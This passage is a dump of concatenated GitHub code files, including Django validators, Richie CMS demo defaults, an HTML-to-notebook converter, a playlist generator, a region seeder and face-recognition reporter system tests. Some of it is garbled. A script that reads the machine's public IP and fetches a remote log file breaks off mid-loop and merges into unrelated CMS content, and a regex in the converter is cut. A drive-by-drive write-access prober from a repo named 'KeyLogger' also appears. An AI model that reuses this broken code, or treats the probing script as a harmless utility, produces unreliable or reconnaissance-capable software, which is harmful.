has a preceding slash and no query string\n \"\"\"\n if value != \"/\":\n value = \"/\" + value.lstrip(\"/\")\n q_index = value.find(\"?\")\n if q_index > 0:\n value = value[:q_index]\n return value\n\n\nclass URLDoesNotExistValidator(ExtendedURLValidator):\n def __call__(self, value):\n \"\"\"\n Validate that the URL does not already exist.\n\n The URL will be verified first and raises ``ValidationError`` when\n it is invalid. A valid URL is checked for existence and raises\n ``ValidationError`` if the URL already exists.\n\n This validation uses two calls to ExtendedURLValidator which can\n be slow. Be aware of this, when you use it.\n\n Returns ``None`` if URL is valid and does not exist.\n \"\"\"\n try:\n self.validate_local_url(value)\n except ValidationError:\n # Page exists - that is what we want\n return\n raise ValidationError(_(\"Specified page already exists!\"), code=\"invalid\")\n\n\ndef non_whitespace(value):\n stripped = value.strip()\n if not stripped:\n raise ValidationError(_(\"This field is required\"))\n return stripped\n\n\ndef non_python_keyword(value):\n if keyword.iskeyword(value):\n raise ValidationError(_(\"This field is invalid as its value is forbidden\"))\n return value\n","repo_name":"django-oscar/django-oscar","sub_path":"src/oscar/core/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"38928212241","text":"import urllib\nimport wget\nimport socket\nimport os\n\nurl = \"http://thearchmage.moe/logfile.txt\"\n\nmy_ip = urllib.urlopen('http://ip.42.pl/raw').read()\n\nf = urllib.urlopen(url)\n\nline = f.readline()\niframetxt = \"\"\nwhile line:\n if \"Welcome to Richie\"\"\"\n \"\"\"
It works! This is the default homepage for the Richie CMS.
\"\"\"\n ),\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_template\": \"richie/section/section.html\",\n \"blogposts_title\": \"Last news\",\n \"blogposts_button_title\": \"More news\",\n \"courses_title\": \"Popular courses\",\n \"courses_button_title\": \"More courses\",\n \"organizations_title\": \"Universities\",\n \"organizations_button_title\": \"More universities\",\n \"persons_title\": \"Persons\",\n \"persons_button_title\": \"More persons\",\n \"programs_title\": \"Programs\",\n \"programs_button_title\": \"More programs\",\n \"subjects_title\": \"Subjects\",\n \"subjects_button_title\": \"More subjects\",\n },\n \"fr\": {\n \"banner_title\": \"Bienvenue sur Richie\",\n \"banner_content\": (\n \"\"\"

Bienvenue sur Richie

\"\"\"\n \"\"\"

Ça marche ! Ceci est la page d'accueil par défaut du CMS Richie.

\"\"\"\n ),\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_template\": \"richie/section/section.html\",\n \"blogposts_title\": \"Actualités récentes\",\n \"blogposts_button_title\": \"Plus d'actualités\",\n \"courses_title\": \"Cours à la une\",\n \"courses_button_title\": \"Plus de cours\",\n \"organizations_title\": \"Universités\",\n \"organizations_button_title\": \"Plus d'universités\",\n \"subjects_title\": \"Thématiques\",\n \"subjects_button_title\": \"Plus de thématiques\",\n \"persons_title\": \"Personnes\",\n \"persons_button_title\": \"Plus de personnes\",\n \"programs_title\": \"Parcours\",\n \"programs_button_title\": \"Plus de parcours\",\n },\n}\nHOMEPAGE_CONTENT.update(getattr(settings, \"RICHIE_DEMO_HOMEPAGE_CONTENT\", {}))\n\nSINGLECOLUMN_CONTENT = {\n \"en\": {\n \"banner_title\": \"Single column template sample\",\n \"banner_content\": \"It works! This is a single column page.\",\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_sample_title\": \"A sample section\",\n \"section_sample_button_title\": \"More!\",\n \"section_sample_template\": \"richie/section/section.html\",\n },\n \"fr\": {\n \"banner_title\": \"Exemple de template avec une colonne unique\",\n \"banner_content\": \"Ça marche ! Ceci est une page d'une colonne.\",\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_sample_title\": \"Une section d'exemple\",\n \"section_sample_button_title\": \"Plus !\",\n \"section_sample_template\": \"richie/section/section.html\",\n },\n}\nSINGLECOLUMN_CONTENT.update(getattr(settings, \"RICHIE_DEMO_SINGLECOLUMN_CONTENT\", {}))\n\nFOOTER_CONTENT = {\n \"en\": [\n {\"name\": \"About\", \"internal_link\": \"annex__about\"},\n {\"name\": \"Sitemap\", \"internal_link\": \"annex__sitemap\"},\n {\"name\": \"Style guide\", \"external_link\": \"/styleguide/\"},\n {\n \"title\": \"Richie community\",\n \"items\": [\n {\"name\": \"Website\", \"external_link\": \"https://richie.education\"},\n {\n \"name\": \"Github\",\n \"external_link\": \"https://github.com/openfun/richie\",\n },\n {\n \"name\": \"Site factory\",\n \"external_link\": \"https://github.com/openfun/richie-site-factory\",\n },\n {\n \"name\": \"Example site\",\n \"external_link\": \"https://www.fun-campus.fr\",\n },\n ],\n },\n ],\n \"fr\": [\n {\"name\": \"A propos\", \"internal_link\": \"annex__about\"},\n {\"name\": \"Plan du site\", \"internal_link\": \"annex__sitemap\"},\n {\"name\": \"Style guide\", \"external_link\": \"/styleguide/\"},\n {\n \"title\": \"Communauté Richie\",\n \"items\": [\n {\"name\": \"Site web\", \"external_link\": \"https://richie.education\"},\n {\n \"name\": \"Github\",\n \"external_link\": \"https://github.com/openfun/richie\",\n },\n {\n \"name\": \"Usine à sites\",\n \"external_link\": \"https://github.com/openfun/richie-site-factory\",\n },\n {\n \"name\": \"Site exemple\",\n \"external_link\": \"https://www.fun-campus.fr\",\n },\n ],\n },\n ],\n}\nFOOTER_CONTENT.update(getattr(settings, \"RICHIE_DEMO_FOOTER_CONTENT\", {}))\n\nCOURSE_CONTENT = {\n \"en\": {\"partners_title\": \"Partners\", \"sponsors_title\": \"Sponsors\"},\n \"fr\": {\"partners_title\": \"Partenaires\", \"sponsors_title\": \"Sponsors\"},\n}\nCOURSE_CONTENT.update(getattr(settings, \"RICHIE_DEMO_COURSE_CONTENT\", {}))\n\nSITEMAP_PAGE_PARAMS = {\n \"blogposts\": {\"max_depth\": 1},\n \"courses\": 
{\"max_depth\": 1},\n \"categories\": {},\n \"organizations\": {\"max_depth\": 1},\n \"persons\": {\"max_depth\": 1},\n \"programs\": {\"max_depth\": 1},\n \"annex\": {\"include_root_page\": False},\n}\n","repo_name":"openfun/richie","sub_path":"src/richie/apps/demo/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":16133,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"72623080427","text":"#!/usr/bin/python\n# html2ipynb\n\nimport sys\nimport re\n\ndef download_file(URL=None):\n import httplib2\n h = httplib2.Http(\".cache\")\n resp, content = h.request(URL, \"GET\")\n return content\n\ndef extract_cells(html):\n r = re.compile(r\"((?:' : \"``` python\\n\", '' : \"```\",\n '' : '`', '' : '`'}\n substrs = sorted(replacements, key=len, reverse=True)\n regexp = re.compile('|'.join(map(re.escape, substrs)))\n html = regexp.sub(lambda match: replacements[match.group(0)], html)\n imgregexp = re.compile(r'(())', re.DOTALL) \n html = imgregexp.sub(r'\\1\\n\\2'+base_url+r'/\\3\\4 alt=\"\\3\" \\5', html)\n return html\n\ndef create_ipynb(cells):\n import json\n all = [\"{ \\\"cells\\\" : [\\n\"]\n for c in cells:\n all.append('{ \"cell_type\": \"markdown\", \"metadata\": {}, \"source\": [ ')\n all.append(json.dumps(c))\n all.append(\" ] }\")\n all.append(\",\\n\")\n all[-1] = \"\\n],\"\n all.append(\"\"\" \n \"metadata\": {\n \"kernelspec\": {\n \"display_name\": \"Python 3\", \"language\": \"python\", \"name\": \"python3\"\n },\n \"language_info\": {\n \"codemirror_mode\": { \"name\": \"ipython\", \"version\": 3 },\n \"file_extension\": \".py\", \"mimetype\": \"text/x-python\",\n \"name\": \"python\", \"nbconvert_exporter\": \"python\",\n \"pygments_lexer\": \"ipython3\", \"version\": \"3.6.1\"\n }\n },\n \"nbformat\": 4, \"nbformat_minor\": 2\n }\"\"\") \n return \"\".join(all)\n\ndef save_notebook(file_path, notebook_content):\n f = open(file_path, \"wb\")\n f.write(notebook_content.encode(\"utf-8\", errors=\"ignore\"))\n f.close()\n\ndef main():\n if len(sys.argv) < 2:\n print(\"usage: html2ipynb.py url [outfile]\")\n url = sys.argv[1]\n out = \"\"\n base_url, name = url.rsplit('/', 1)\n if len(sys.argv) == 2:\n out = name + \".ipynb\"\n else:\n out = sys.argv[2]\n if not out.endswith(\".ipynb\"):\n out += \".ipynb\"\n\n html = download_file(url)\n html = html.decode(\"UTF-8\", errors=\"ignore\")\n raw_cells = extract_cells(html)\n refined_cells = [refine_cell(c, base_url) for c in raw_cells]\n ipynb = create_ipynb(refined_cells)\n save_notebook(out, ipynb)\n\n print('\"'+url+'\" converted to \"'+out+'\"')\n\nmain()\n","repo_name":"Ivan1248/scripts","sub_path":"html2ipynb.py","file_name":"html2ipynb.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31540735085","text":"import os\ndisks = ['%s:' % d for d in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists('%s:' % d)]\ndef check(disk):\n\tprint(disk + \"\\\\:\")\n\tfiles = os.listdir(disk + \"\\\\\")\n\tfor line in files:\n\t\tif(os.path.isdir(disk + \"\\\\\" + line)):\n\t\t\ttry:\n\t\t\t\tos.mkdir(disk + \"\\\\\" + line + \"\\\\Test\")\n\t\t\t\tprint(line + \" : True\")\n\t\t\t\tos.rmdir(disk + \"\\\\\" + line + \"\\\\Test\")\n\t\t\texcept:\n\t\t\t\tprint(line + \" : False\")\nfor disk in disks:\n\tcheck(disk)\n\ninput(\"Введите что-нибудь, чтобы 
выйти\")\n","repo_name":"Egor5555565/KeyLogger","sub_path":"Exe/CheckAccess/Compile/CheckAccess.py","file_name":"CheckAccess.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29790443545","text":"import numpy as np \nimport pandas as pd \n\ndf = pd.DataFrame({'y_test': [1,1,0,0,0,0,0,0,0,1,1,1,1,1],\n 'preds_test': [0.8,0.7,0.4,0.3,0.2,0.5,0.6,0.7,0.8,0.1,0.2,0.3,0.4,0],\n 'category': ['TP','TP','TN','TN','TN','FP','FP','FP','FP','FN','FN','FN','FN','FN']\n })\n\ny = df['y_test']\npred = df['preds_test']\n\ndef get_true_pos(y, pred, th=0.5):\n TP = 0\n thresholded_preds = pred >= th\n print(thresholded_preds)\n TP = np.sum((y == 1) & (thresholded_preds == 1))\n #print(TP)\n\n\n\nget_true_pos(y = y, pred=pred, th=0.5)","repo_name":"ShanthaKumarR/Chest_X_ray_Diagnoisis","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19703750637","text":"class LinkedList:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef removeDuplicatesFromLinkedList(linkedList):\n curr = linkedList\n\n while curr.next:\n if curr.value == curr.next.value:\n curr.next = curr.next.next\n else:\n curr = curr.next\n return linkedList\n","repo_name":"aivandes/algoexpert_solutions","sub_path":"Remove_Duplicates_From_Linked_List.py","file_name":"Remove_Duplicates_From_Linked_List.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3553211221","text":"import os\nimport json\nimport sys\n\nimport includes\n\ndef writePlaylist(dstPath, fileList):\n if not isinstance(fileList, list):\n return False\n\n if not os.path.exists(dstPath):\n return False\n\n i = 0\n rootDict = {}\n\n print('length fileList = {}'.format(len(fileList)))\n for item in fileList:\n\n itemDict = {}\n itemDict['path'] = item\n itemDict['name'] = os.path.basename(item)\n itemDict['post'] = \"\"\n itemDict['pre'] = \"\"\n itemDict['start'] = 0\n itemDict['end'] = 0\n\n rootDict[i]=itemDict\n\n i = i + 1\n\n #convert dict to json\n tmp = json.dumps(rootDict, indent=4, sort_keys=False)\n\n with open(os.path.join(dstPath, 'playlist.json'), \"w\") as f:\n f.write(tmp)\n\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print('please specify media file diretory and destination directory...')\n sys.exit(0)\n\n dir = sys.argv[1]\n if not os.path.isdir(dir):\n print('specified source path is not a directory...')\n sys.exit(0)\n\n dirDest = sys.argv[2]\n if not os.path.isdir(dirDest):\n print('specified destination path is not a directory...')\n sys.exit(0)\n\n files = os.listdir(dir)\n\n videoFormats = tuple(includes.config['video']['types'].split(','))\n audioFormats = tuple(includes.config['audio']['types'].split(','))\n\n playlistFiles = []\n for file in files:\n path = os.path.join(dir, file)\n if os.path.isfile(path):\n print(file)\n if path.lower().endswith(videoFormats) or path.lower().endswith(audioFormats):\n playlistFiles.append(path)\n\n writePlaylist(dirDest, playlistFiles)\n","repo_name":"thomaskhub/pi-player","sub_path":"playlist_generator.py","file_name":"playlist_generator.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20996567232","text":"import json\nimport 
os\n\nfrom django.contrib.gis.geos import MultiPolygon, Polygon\nfrom django.core.cache import cache\nfrom django.core.management import BaseCommand\n\nfrom common.models import Region, Country\nfrom locust.settings import BASE_DIR\n\n\ndef regions():\n try:\n regions = json.load(open(os.path.join(BASE_DIR, 'regions.json')))\n uzb = Country.objects.get(alpha_two_code='UZ')\n for region in regions['features']:\n polygons = []\n for i in region['geometry']['coordinates']:\n polygons.append(Polygon(i[0]))\n try:\n instance = Region.objects.get(pk=region['id'])\n instance.country = uzb\n instance.name_uz = region['name_uz']\n instance.name_en = region['name_en']\n instance.name_ru = region['name_ru']\n instance.geometry = MultiPolygon(polygons)\n instance.save()\n print(f'{instance.name_uz} is successfully updated.')\n except:\n instance = Region.objects.create(\n id=region['id'],\n country=uzb,\n name_uz=region['name_uz'],\n name_en=region['name_en'],\n name_ru=region['name_ru'],\n geometry=MultiPolygon(polygons),\n )\n print(f'{instance.name_uz} is successfully created.')\n except Exception as e:\n print(e)\n\n\nclass Command(BaseCommand):\n help = 'It will seed database automatically with initial data'\n\n def handle(self, *args, **options):\n regions()\n # cache.clear()\n","repo_name":"Abdulrakhmon/locust","sub_path":"apps/common/management/commands/db_crud.py","file_name":"db_crud.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71073726508","text":"from io import BytesIO\nfrom itertools import chain\nfrom time import sleep\nfrom zipfile import ZipFile\n\nfrom tests.system_tests import fsmRequests\nfrom tests.system_tests.base_test_class import BaseTest\nfrom tests.system_tests.config import USE_LATEX, FSM2_API_VERSION\nfrom tests.system_tests.test_data_option import *\n\n\nclass ReporterTest(BaseTest):\n name = 'test_visionlabs_reporter'\n events = []\n handlers = []\n\n @classmethod\n def setUpClass(cls):\n # create lists\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.listDescriptors = reply.body['list_id']\n cls.listsToDelete += [cls.listDescriptors]\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.listPersons = reply.body['list_id']\n cls.listsToDelete += [cls.listPersons]\n\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.outputListDescriptors = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.outputListPersons = reply.body['list_id']\n\n # create persons\n for personImgs in personsImgs:\n # create person\n reply = cls.lunaClient.createPerson(cls.name)\n assert reply.statusCode == 201, reply.statusCode\n pId = reply.body['person_id']\n cls.personsToDelete += [pId]\n\n # link to persons list\n reply = cls.lunaClient.linkListToPerson(pId, cls.listPersons)\n assert reply.statusCode == 204, reply.statusCode\n\n for img in personImgs:\n # extract descriptor\n reply = cls.lunaClient.extractDescriptors(filename=img)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n # link to descriptors list\n reply = cls.lunaClient.linkListToDescriptor(dId, cls.listDescriptors)\n assert reply.statusCode == 204, reply.statusCode\n\n # link to person\n reply = 
cls.lunaClient.linkDescriptorToPerson(pId, dId)\n assert reply.statusCode == 204, reply.statusCode\n\n handlers = [\n {\n \"name\": cls.name,\n \"type\": \"extract\",\n 'multiple_faces_policy': 1,\n \"extract_policy\": {\n \"estimate_attributes\": ea,\n },\n \"grouping_policy\": {\n \"ttl\": 10,\n \"grouper\": 2,\n \"threshold\": 0.9,\n },\n \"descriptor_policy\": {\n \"attach_policy\": [{\n \"list_id\": cls.outputListDescriptors\n }]\n },\n \"person_policy\": {\n \"create_person_policy\": {\n \"create_person\": 1,\n \"attach_policy\": [{\n \"list_id\": cls.outputListPersons\n }]\n }\n }\n } for ea in range(2)\n ]\n\n for handler_type, handler in enumerate(handlers):\n reply = fsmRequests.createHandler(handler)\n assert reply.statusCode == 201, reply.json\n cls.handlers.append(reply.json['handler_id'])\n\n for img in events:\n reply = fsmRequests.emitEvent(\n cls.handlers[handler_type],\n img,\n {\n 'user_data': cls.name,\n 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'\n }\n )\n assert reply.statusCode == 201, reply.json\n cls.events.append(reply.json['events'][0])\n sleep(10) # wait group ttl\n\n object_types = ('descriptors', 'persons', 'events', 'groups', 'events_attributes', 'groups_attributes')\n\n cross_matcher_tasks = [\n {\n \"description\": cls.name,\n \"references\": references,\n \"candidates\": {\"list_id\": list_id},\n }\n for references in [\n {\n \"objects\": 'luna_list',\n \"filters\": {\"list_id\": cls.outputListDescriptors},\n },\n {\n \"objects\": 'luna_list',\n \"filters\": {\"list_id\": cls.outputListPersons},\n },\n {\n \"objects\": 'events',\n \"filters\": {\"handler_ids\": [cls.handlers[0]]},\n },\n {\n \"objects\": 'groups',\n \"filters\": {\"handler_ids\": [cls.handlers[0]]},\n },\n {\n \"objects\": 'events',\n \"filters\": {\"handler_ids\": [cls.handlers[1]]},\n },\n {\n \"objects\": 'groups',\n \"filters\": {\"handler_ids\": [cls.handlers[1]]},\n },\n ]\n for list_id in (cls.listDescriptors, cls.listPersons)\n ]\n\n replies = [fsmRequests.createTaskCrossMatcher(task) for task in cross_matcher_tasks]\n for reply in replies:\n assert reply.statusCode == 202, reply.json\n cls.cross_match_task_ids = dict(zip(\n (\n x + '_to_' + y\n for x in object_types\n for y in object_types[:2]\n ),\n (reply.json['task_id'] for reply in replies)\n ))\n\n clusterizer_tasks = [\n {\n \"description\": cls.name,\n \"objects\": \"luna_list\",\n \"filters\": {\n \"list_id\": list_id\n }\n }\n for list_id in (cls.outputListDescriptors, cls.outputListPersons)\n ] + [\n {\n \"description\": cls.name,\n \"objects\": objects,\n \"filters\": {\n \"handler_ids\": [handler]\n }\n }\n for handler in cls.handlers\n for objects in (\"events\", \"groups\")\n ]\n\n replies = [fsmRequests.createTaskClusterization(task) for task in clusterizer_tasks]\n for reply in replies:\n assert reply.statusCode == 202, reply.json\n cls.clusterizer_task_ids = dict(zip(\n object_types,\n (reply.json['task_id'] for reply in replies)\n ))\n\n # create failed task\n reply = fsmRequests.createTaskClusterization(\n {\"objects\": \"events\", \"filters\": {\"handler_ids\": [str(uuid4())]}, \"description\": cls.name})\n assert reply.statusCode == 202, reply.json\n cls.fail_task_id = reply.json['task_id']\n\n # wait tasks ready\n cls.wait_tasks_ready([*cls.cross_match_task_ids.values(), *cls.clusterizer_task_ids.values(), cls.fail_task_id])\n\n def assertCSVReport(self, task_id, attributes_enabled=0):\n # todo add attributes check\n reply = fsmRequests.getReport(task_id)\n 
self.assertEqual(reply.status_code, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.headers['Content-Type'], 'application/zip', reply.json)\n with ZipFile(BytesIO(reply.content)) as zipfile:\n with zipfile.open('{}.csv'.format(task_id)) as CSVfile:\n # get photos\n text = CSVfile.read().decode()\n table = [line.split(',') for line in text.split('\\n')]\n photoCols = [i for i in range(len(table[0])) if 'Photo Name' in table[0][i]]\n photos = [line[i] for line in table[1:] for i in range(len(line)) if i in photoCols]\n attributesCols = [i for i in range(len(table[0])) if 'Reference Age' in table[0][i] or 'Reference Gender' in table[0][i]]\n attributes = [line[i] for line in table[1:] for i in range(len(line)) if i in attributesCols]\n # assert all photos exists\n self.assertEqual(len(set(photos)) + 1, len(zipfile.filelist), \"Wrong count of files in zipfile\")\n for photo in photos:\n self.assertIn('portraits/{}'.format(photos[0]), [file.filename for file in zipfile.filelist],\n 'Portrait \"{}\" is not in filelist'.format(photo))\n for attr in attributes:\n if attributes_enabled:\n self.assertTrue(attr.isdigit(), attributes)\n else:\n self.assertEqual(attr, 'None', attributes)\n\n def assertPDFReport(self, task_id):\n reply = fsmRequests.getReport(task_id)\n self.assertEqual(reply.status_code, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.headers['Content-Type'], 'application/pdf', reply.json)\n\n def test_cross_match_descriptors_to_descriptors_csv(self):\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_descriptors_to_persons_csv(self):\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_persons']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_persons_to_descriptors_csv(self):\n cross_match_task_id = self.cross_match_task_ids['persons_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_persons_to_persons_csv(self):\n cross_match_task_id = self.cross_match_task_ids['persons_to_persons']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_events_to_descriptors_csv(self):\n for attributes in range(1, 2):\n task_name = {0: 'events_to_descriptors', 1: 'events_attributes_to_descriptors'}[attributes]\n with 
self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_events_to_persons_csv(self):\n for attributes in range(2):\n task_name = {0: 'events_to_persons', 1: 'events_attributes_to_persons'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_groups_to_descriptors_csv(self):\n for attributes in range(2):\n task_name = {0: 'groups_to_descriptors', 1: 'groups_attributes_to_descriptors'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_groups_to_persons_csv(self):\n for attributes in range(2):\n task_name = {0: 'groups_to_persons', 1: 'groups_attributes_to_persons'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n # todo @skipIf(not USE_LATEX, \"Latex disabled\")\n def test_cross_match_descriptors_to_descriptors_pdf(self):\n if not USE_LATEX:\n return\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"pdf\", \"parameters\": {\n \"colors_bounds\": {\"red\": 0.8, \"orange\": 0.4, \"green\": 0.0}\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertPDFReport(task_id)\n\n def test_clusterization_descriptors_csv(self):\n clusterization_task_id = self.clusterizer_task_ids['descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_clusterization_persons_csv(self):\n clusterization_task_id = self.clusterizer_task_ids['persons']\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n 
self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_clusterization_events_csv(self):\n for attributes in range(2):\n task_name = {0: 'events', 1: 'events_attributes'}[attributes]\n with self.subTest(task_name):\n clusterization_task_id = self.clusterizer_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id, attributes)\n\n def test_clusterization_groups_csv(self):\n for attributes in range(2):\n task_name = {0: 'groups', 1: 'groups_attributes'}[attributes]\n with self.subTest(task_name):\n clusterization_task_id = self.clusterizer_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id, attributes)\n\n # todo @skipIf(not USE_LATEX, \"Latex disabled\")\n def test_clusterization_descriptors_pdf(self):\n if not USE_LATEX:\n return\n clusterization_task_id = self.clusterizer_task_ids['descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"pdf\", \"parameters\": {\n \"colors_bounds\": {\"red\": 0.8, \"orange\": 0.4, \"green\": .0}\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertPDFReport(task_id)\n\n def test_nonexistent_task_id(self):\n primary_task_id = max(self.clusterizer_task_ids.values()) + 100\n reply = fsmRequests.createTaskReporter({\"task_id\": primary_task_id, \"format\": \"csv\", \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n secondary_task_id = reply.json['task_id']\n self.wait_tasks_ready([secondary_task_id])\n reply = fsmRequests.getDoneTask(secondary_task_id)\n self.assertEqual(reply.statusCode, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.json['result']['errors']['errors'][0],\n {'error_code': 13010, 'detail': 'No task found by id'})\n\n def test_failed_task_id(self):\n primary_task_id = self.fail_task_id\n reply = fsmRequests.createTaskReporter({\"task_id\": primary_task_id, \"format\": \"csv\", \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n secondary_task_id = reply.json['task_id']\n self.wait_tasks_ready([secondary_task_id])\n reply = fsmRequests.getDoneTask(secondary_task_id)\n self.assertEqual(reply.statusCode, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.json['result']['errors']['errors'][0], {\n 'detail': 'Inconsistent input data found: \"Reporter got task {} with status \\'failed\\'\"'.format(\n primary_task_id), 'error_code': 15007})\n\n def test_wrong_task_type(self):\n reply = fsmRequests.createTaskHitTopN({\n \"list_id\": self.listPersons,\n \"top_n\": 4,\n \"description\": self.name\n })\n primary_task_id = reply.json['task_id']\n self.wait_tasks_ready([primary_task_id])\n reply = fsmRequests.createTaskReporter({\"task_id\": 
